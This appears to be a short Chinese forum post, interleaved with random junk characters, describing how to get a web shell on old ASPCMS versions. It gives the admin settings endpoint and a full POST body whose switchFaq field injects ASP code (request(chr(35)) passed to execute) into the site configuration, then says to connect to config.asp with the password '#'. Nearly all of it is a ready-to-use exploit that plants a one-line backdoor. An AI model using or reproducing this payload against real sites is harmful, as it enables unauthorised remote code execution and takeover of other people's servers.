老的ASPCMS版本的秒杀拿SHELL漏洞( K1 O% l. A. G, U* Z. q. N
* P/ T8 J% Z! n/ @7 a+ g 找到后台。。。然后
4 w2 i- u! y/ ?7 {0 x5 q9 B* g * Z" Q8 B1 ?& ~3 _- d+ E3 N& G1 M
/admin/_system/AspCms_SiteSetting.asp?action=saves3 W" R$ _. W9 [1 @* N" V
" p) t# Q4 u" w4 {5 N0 d
直接POST
1 ?, I& l. U* t; L6 d t- K; |3 {3 I , ]9 D6 g* i. T A* D* x3 |5 b& d
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1) t- v- ]9 t d0 v9 Z
5 x% K7 I. t$ v) T" \6 z
再连接配置文件config.asp 密码为#8 ? I! i) D! b6 }3 {( o$ F
|